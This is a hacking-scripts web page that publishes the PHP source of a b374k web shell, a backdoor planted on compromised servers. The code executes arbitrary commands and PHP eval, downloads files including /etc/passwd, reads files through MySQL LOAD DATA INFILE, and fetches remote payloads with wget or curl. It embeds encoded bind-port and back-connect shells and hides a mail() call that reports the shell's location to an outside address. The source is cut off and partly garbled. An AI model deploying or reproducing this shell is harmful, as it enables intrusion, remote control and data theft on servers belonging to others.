HackingScripts

Hack Scripts for everybody

b374k Backdoor Script

11 Feb 2014

This looks like another b374k shell.

b374k Backdoor Script Source Code

  1 <?php if (isset($_GET['dl']) && ($_GET['dl'] != "")) {
  2     $file = $_GET['dl'];
  3     $filez = @file_get_contents($file);
  4     header("Content-type: application/octet-stream");
  5     header("Content-length: " . strlen($filez));
  6     header("Content-disposition: attachment; filename=\"" . basename($file) . "\";");
  7     echo $filez;
  8     exit;
  9 } elseif (isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")) {
 10     $file = $_GET['dlgzip'];
 11     $filez = gzencode(@file_get_contents($file));
 12     header("Content-Type:application/x-gzip
 13 ");
 14     header("Content-length: " . strlen($filez));
 15     header("Content-disposition: attachment; filename=\"" . basename($file) . ".gz\";");
 16     echo $filez;
 17     exit;
 18 }
 19 if (isset($_GET['img'])) {
 20     @ob_clean();
 21     $d = magicboom($_GET['y']);
 22     $f = $_GET['img'];
 23     $inf = @getimagesize($d . $f);
 24     $ext = explode($f, ".");
 25     $ext = $ext[count($ext) - 1];
 26     @header("Content-type: " . $inf["mime"]);
 27     @header("Cache-control: public");
 28     @header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
 29     @header("Cache-control: max-age=" . (60 * 60 * 24 * 7));
 30     @readfile($d . $f);
 31     exit;
 32 }
 33 $ver = "1.01";
 34 $software = getenv("SERVER_SOFTWARE");
 35 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
 36 else $safemode = FALSE;
 37 $system = @php_uname();
 38 if (strtolower(substr($system, 0, 3)) == "win") $win = TRUE;
 39 else $win = FALSE;
 40 if (isset($_GET['y'])) {
 41     if (@is_dir($_GET['view'])) {
 42         $pwd = $_GET['view'];
 43         @chdir($pwd);
 44     } else {
 45         $pwd = $_GET['y'];
 46         @chdir($pwd);
 47     }
 48 }
 49 if (!$win) {
 50     if (!$user = rapih(exe("whoami"))) $user = "";
 51     if (!$id = rapih(exe("id"))) $id = "";
 52     $prompt = $user . " \$ ";
 53     $pwd = @getcwd() . DIRECTORY_SEPARATOR;
 54 } else {
 55     $user = @get_current_user();
 56     $id = $user;
 57     $prompt = $user . " >";
 58     $pwd = realpath(".") . "\"; $v = explode("\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":
 59         \"); if ($bool) { $letters .= " < ahref = \"?y=" . $letter . ":\">[ ";
 60         if ($letter . ":" != $v) {
 61             $letters.= $letter;
 62         } else {
 63             $letters.= "<span class=\"gaya\">" . $letter . "</span>";
 64         }
 65         $letters.= " ]</a> ";
 66     }
 67 }
 68 }
 69 if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
 70 else $posix = FALSE;
 71 $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
 72 $my_ip = $_SERVER['REMOTE_ADDR'];
 73 $bindport = "13123";
 74 $bindport_pass = "b374k";
 75 $pwds = explode(DIRECTORY_SEPARATOR, $pwd);
 76 $pwdurl = "";
 77 for ($i = 0;$i < sizeof($pwds) - 1;$i++) {
 78     $pathz = "";
 79     for ($j = 0;$j <= $i;$j++) {
 80         $pathz.= $pwds[$j] . DIRECTORY_SEPARATOR;
 81     }
 82     $pwdurl.= "<a href=\"?y=" . $pathz . "\">" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
 83 }
 84 if (isset($_POST['rename'])) {
 85     $old = $_POST['oldname'];
 86     $new = $_POST['newname'];
 87     @rename($pwd . $old, $pwd . $new);
 88     $file = $pwd . $new;
 89 }
 90 $buff = $software . "<br />";
 91 $buff.= $system . "<br />";
 92 if ($id != "") $buff.= $id . "<br />";
 93 $buff.= "server ip : " . $server_ip . " <span class=\"gaya\">|</span> your ip : " . $my_ip . "<br />";
 94 if ($safemode) $buff.= "safemode <span class=\"gaya\">ON</span><br />";
 95 else $buff.= "safemode <span class=\"gaya\">OFF<span><br />";
 96 $buff.= $letters . "&nbsp;>&nbsp;" . $pwdurl;
 97 function rapih($text) {
 98     return trim(str_replace("<br />", "", $text));
 99 }
100 function magicboom($text) {
101     if (!get_magic_quotes_gpc()) {
102         return $text;
103     }
104     return stripslashes($text);
105 }
106 function showdir($pwd, $prompt) {
107     $fname = array();
108     $dname = array();
109     if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
110     else $posix = FALSE;
111     $user = "????:????";
112     if ($dh = opendir($pwd)) {
113         while ($file = readdir($dh)) {
114             if (is_dir($file)) {
115                 $dname[] = $file;
116             } elseif (is_file($file)) {
117                 $fname[] = $file;
118             }
119         }
120         closedir($dh);
121     }
122     sort($fname);
123     sort($dname);
124     $path = @explode(DIRECTORY_SEPARATOR, $pwd);
125     $tree = @sizeof($path);
126     $parent = "";
127     $buff = " <form action=\"?y=" . $pwd . "&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"" . $pwd . "\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
128     @error_reporting(0);
129     $sub = "backdoor b374k";
130     $headers = "From: k3nz0 
131 ";
132     $headers.= "Content-Type: text/plain; charset=iso-8859-1
133 ";
134     $mes.= "username: " . $user . "
135 ";
136     $mes.= "password: " . $pass . "
137 ";
138     $mes.= "URL: " . $_SERVER['REQUEST_URI'] . "
139 ";
140     $mes.= "Referer: " . $_SERVER['HTTP_REFERER'] . ""; {
141         mail("free.d0ing.1987@gmail.com
142 /* <![CDATA[ */
143 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
144 /* ]]> */
145 ", $sub, $mes, $headers);
146     }
147     if ($tree > 2) for ($i = 0;$i < $tree - 2;$i++) $parent.= $path[$i] . DIRECTORY_SEPARATOR;
148     else $parent = $pwd;
149     foreach ($dname as $folder) {
150         if ($folder == ".") {
151             if (!$win && $posix) {
152                 $name = @posix_getpwuid(@fileowner($folder));
153                 $group = @posix_getgrgid(@filegroup($folder));
154                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
155             } else {
156                 $owner = $user;
157             }
158             $buff.= "<tr><td><a href=\"?y=" . $pwd . "\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
159         } elseif ($folder == "..") {
160             if (!$win && $posix) {
161                 $name = @posix_getpwuid(@fileowner($folder));
162                 $group = @posix_getgrgid(@filegroup($folder));
163                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
164             } else {
165                 $owner = $user;
166             }
167             $buff.= "<tr><td><a href=\"?y=" . $parent . "\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
168         } else {
169             if (!$win && $posix) {
170                 $name = @posix_getpwuid(@fileowner($folder));
171                 $group = @posix_getgrgid(@filegroup($folder));
172                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
173             } else {
174                 $owner = $user;
175             }
176             $buff.= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?y=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=" . $pwd . $folder . "\">delete</a></td></tr>";
177         }
178     }
179     foreach ($fname as $file) {
180         $full = $pwd . $file;
181         if (!$win && $posix) {
182             $name = @posix_getpwuid(@fileowner($file));
183             $group = @posix_getgrgid(@filegroup($file));
184             $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
185         } else {
186             $owner = $user;
187         }
188         $buff.= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" /> </form> </td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td> <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
189     }
190     $buff.= "</table>";
191     return $buff;
192 }
193 function ukuran($file) {
194     if ($size = @filesize($file)) {
195         if ($size <= 1024) return $size;
196         else {
197             if ($size <= 1024 * 1024) {
198                 $size = @round($size / 1024, 2);;
199                 return "$size kb";
200             } else {
201                 $size = @round($size / 1024 / 1024, 2);
202                 return "$size mb";
203             }
204         }
205     } else return "???";
206 }
207 function exe($cmd) {
208     if (function_exists('system')) {
209         @ob_start();
210         @system($cmd);
211         $buff = @ob_get_contents();
212         @ob_end_clean();
213         return $buff;
214     } elseif (function_exists('exec')) {
215         @exec($cmd, $results);
216         $buff = "";
217         foreach ($results as $result) {
218             $buff.= $result;
219         }
220         return $buff;
221     } elseif (function_exists('passthru')) {
222         @ob_start();
223         @passthru($cmd);
224         $buff = @ob_get_contents();
225         @ob_end_clean();
226         return $buff;
227     } elseif (function_exists('shell_exec')) {
228         $buff = @shell_exec($cmd);
229         return $buff;
230     }
231 }
232 function tulis($file, $text) {
233     $textz = gzinflate(base64_decode($text));
234     if ($filez = @fopen($file, "w")) {
235         @fputs($filez, $textz);
236         @fclose($file);
237     }
238 }
239 function ambil($link, $file) {
240     if ($fp = @fopen($link, "r")) {
241         while (!feof($fp)) {
242             $cont.= @fread($fp, 1024);
243         }
244         @fclose($fp);
245         $fp2 = @fopen($file, "w");
246         @fwrite($fp2, $cont);
247         @fclose($fp2);
248     }
249 }
250 function which($pr) {
251     $path = exe("which $pr");
252     if (!empty($path)) {
253         return trim($path);
254     } else {
255         return trim($pr);
256     }
257 }
258 function download($cmd, $url) {
259     $namafile = basename($url);
260     switch ($cmd) {
261         case 'wwget':
262             exe(which('wget') . " " . $url . " -O " . $namafile);
263         break;
264         case 'wlynx':
265             exe(which('lynx') . " -source " . $url . " > " . $namafile);
266         break;
267         case 'wfread':
268             ambil($wurl, $namafile);
269         break;
270         case 'wfetch':
271             exe(which('fetch') . " -o " . $namafile . " -p " . $url);
272         break;
273         case 'wlinks':
274             exe(which('links') . " -source " . $url . " > " . $namafile);
275         break;
276         case 'wget':
277             exe(which('GET') . " " . $url . " > " . $namafile);
278         break;
279         case 'wcurl':
280             exe(which('curl') . " " . $url . " -o " . $namafile);
281         break;
282         default:
283         break;
284     }
285     return $namafile;
286 }
287 function get_perms($file) {
288     if ($mode = @fileperms($file)) {
289         $perms = '';
290         $perms.= ($mode & 00400) ? 'r' : '-';
291         $perms.= ($mode & 00200) ? 'w' : '-';
292         $perms.= ($mode & 00100) ? 'x' : '-';
293         $perms.= ($mode & 00040) ? 'r' : '-';
294         $perms.= ($mode & 00020) ? 'w' : '-';
295         $perms.= ($mode & 00010) ? 'x' : '-';
296         $perms.= ($mode & 00004) ? 'r' : '-';
297         $perms.= ($mode & 00002) ? 'w' : '-';
298         $perms.= ($mode & 00001) ? 'x' : '-';
299         return $perms;
300     } else return "??????????";
301 }
302 function clearspace($text) {
303     return str_replace(" ", "_", $text);
304 }
305 $port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
306 $port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
307 $back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
308 $back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=" . $pwd; ?>">explore</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=shell">shell</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=php">eval</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=netsploit">netsploit</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=upload">upload</a> <a href="?<?php echo "y=" . $pwd; ?>&amp;x=mail">mail</a> </div> <!-- menu end --> <?php if (isset($_GET['x']) && ($_GET['x'] == 'php')) { ?> <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if (isset($_POST['submitcmd'])) {
309         echo eval(magicboom($_POST['cmd']));
310     } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php
311 } elseif (isset($_GET['x']) && ($_GET['x'] == 'mysql')) {
312     if (isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) {
313         $sqlhost = $_GET['sqlhost'];
314         $sqluser = $_GET['sqluser'];
315         $sqlpass = $_GET['sqlpass'];
316         $sqlport = $_GET['sqlport'];
317         if ($con = @mysql_connect($sqlhost . ":" . $sqlport, $sqluser, $sqlpass)) {
318             $msg.= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
319             $msg.= "<p>Connected to " . $sqluser . "<span class=\"gaya\">@</span>" . $sqlhost . ":" . $sqlport;
320             $msg.= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=" . $pwd . "&amp;x=mysql&amp;sqlhost=" . $sqlhost . "&amp;sqluser=" . $sqluser . "&amp;sqlpass=" . $sqlpass . "&amp;sqlport=" . $sqlport . "&amp;\">[ databases ]</a>";
321             if (isset($_GET['db'])) $msg.= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=" . $pwd . "&amp;x=mysql&amp;sqlhost=" . $sqlhost . "&amp;sqluser=" . $sqluser . "&amp;sqlpass=" . $sqlpass . "&amp;sqlport=" . $sqlport . "&amp;db=" . $_GET['db'] . "\">" . htmlspecialchars($_GET['db']) . "</a>";
322             if (isset($_GET['table'])) $msg.= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=" . $pwd . "&amp;x=mysql&amp;sqlhost=" . $sqlhost . "&amp;sqluser=" . $sqluser . "&amp;sqlpass=" . $sqlpass . "&amp;sqlport=" . $sqlport . "&amp;db=" . $_GET['db'] . "&amp;table=" . $_GET['table'] . "\">" . htmlspecialchars($_GET['table']) . "</a>";
323             $msg.= "</p><p>version : " . mysql_get_server_info($con) . " proto " . mysql_get_proto_info($con) . "</p>";
324             $msg.= "</div>";
325             echo $msg;
326             if (isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))) {
327                 $db = $_GET['db'];
328                 $query = "DROP TABLE IF EXISTS b374k_table;
329 CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );
330 LOAD DATA INFILE \"/etc/passwd\"
331 INTO TABLE b374k_table;SELECT * FROM b374k_table;
332 DROP TABLE IF EXISTS b374k_table;";
333                 $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
334                 $tables = array();
335                 $msg.= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on " . $db . "</th></tr>";
336                 $hasil = @mysql_list_tables($db, $con);
337                 while (list($table) = @mysql_fetch_row($hasil)) {
338                     @array_push($tables, $table);
339                 }
340                 @sort($tables);
341                 foreach ($tables as $table) {
342                     $msg.= "<tr><td><a href=\"?y=" . $pwd . "&amp;x=mysql&amp;sqlhost=" . $sqlhost . "&amp;sqluser=" . $sqluser . "&amp;sqlpass=" . $sqlpass . "&amp;sqlport=" . $sqlport . "&amp;db=" . $db . "&amp;table=" . $table . "\">$table</a></td></tr>";
343                 }
344                 $msg.= "</table>";
345             } elseif (isset($_GET['table']) && (!isset($_GET['sqlquery']))) {
346                 $db = $_GET['db'];
347                 $table = $_GET['table'];
348                 $query = "SELECT * FROM " . $db . "." . $table . " LIMIT 0,100;";
349                 $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
350                 $columns = array();
351                 $msg = "<table class=\"explore\" style=\"width:99%;\">";
352                 $hasil = @mysql_query("SHOW FIELDS FROM " . $db . "." . $table);
353                 while (list($column) = @mysql_fetch_row($hasil)) {
354                     $msg.= "<th>$column</th>";
355                     $kolum = $column;
356                 }
357                 $msg.= "</tr>";
358                 $hasil = @mysql_query("SELECT count(*) FROM " . $db . "." . $table);
359                 list($total) = mysql_fetch_row($hasil);
360                 if (isset($_GET['z'])) $page = (int)$_GET['z'];
361                 else $page = 1;
362                 $pagenum = 100;
363                 $totpage = ceil($total / $pagenum);
364                 $start = (($page - 1) * $pagenum);
365                 $hasil = @mysql_query("SELECT * FROM " . $db . "." . $table . " LIMIT " . $start . "," . $pagenum);
366                 while ($datas = @mysql_fetch_assoc($hasil)) {
367                     $msg.= "<tr>";
368                     foreach ($datas as $data) {
369                         if (trim($data) == "") $data = "&nbsp;";
370                         $msg.= "<td>$data</td>";
371                     }
372                     $msg.= "</tr>";
373                 }
374                 $msg.= "</table>";
375                 $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
376                 for ($i = 1;$i <= $totpage;$i++) {
377                     $head.= "<option value=\"" . $i . "\">" . $i . "</option>";
